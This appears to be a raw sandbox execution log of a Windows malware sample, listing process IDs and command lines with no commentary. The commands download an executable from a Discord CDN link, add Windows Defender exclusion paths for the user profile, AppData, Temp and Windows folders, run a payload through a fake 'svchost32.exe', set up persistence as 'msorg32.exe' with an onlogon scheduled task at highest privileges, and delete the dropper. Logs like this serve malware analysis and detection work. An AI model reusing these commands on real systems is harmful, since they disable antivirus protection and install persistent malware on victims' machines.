cmd.exe "C:\Windows\system32\cmd" /c "C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\7B16.bat C:\Users\test22\AppData\Local\Temp\1.exe"
1636extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
1080extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
1376extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/878569652987502634/878573089506607124/mmserv32.exe" "mmserv32.exe" "" "" "" "" "" ""
1168cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
2452powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2712powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2440powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
1788powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
2928cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe"
248svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Local\Temp\7877\mmserv32.exe"
1328cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit
240schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"'
888cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
1956powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
2512powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
2060cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe"
2396svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\msorg32.exe"
1088cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"' & exit
1428schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "msorg32" /tr '"C:\Windows\system32\msorg32.exe"'
2500cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
2392choice.exe choice /C Y /N /D Y /T 3
2300extd.exe C:\Users\test22\AppData\Local\Temp\7B05.tmp\7B15.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
2404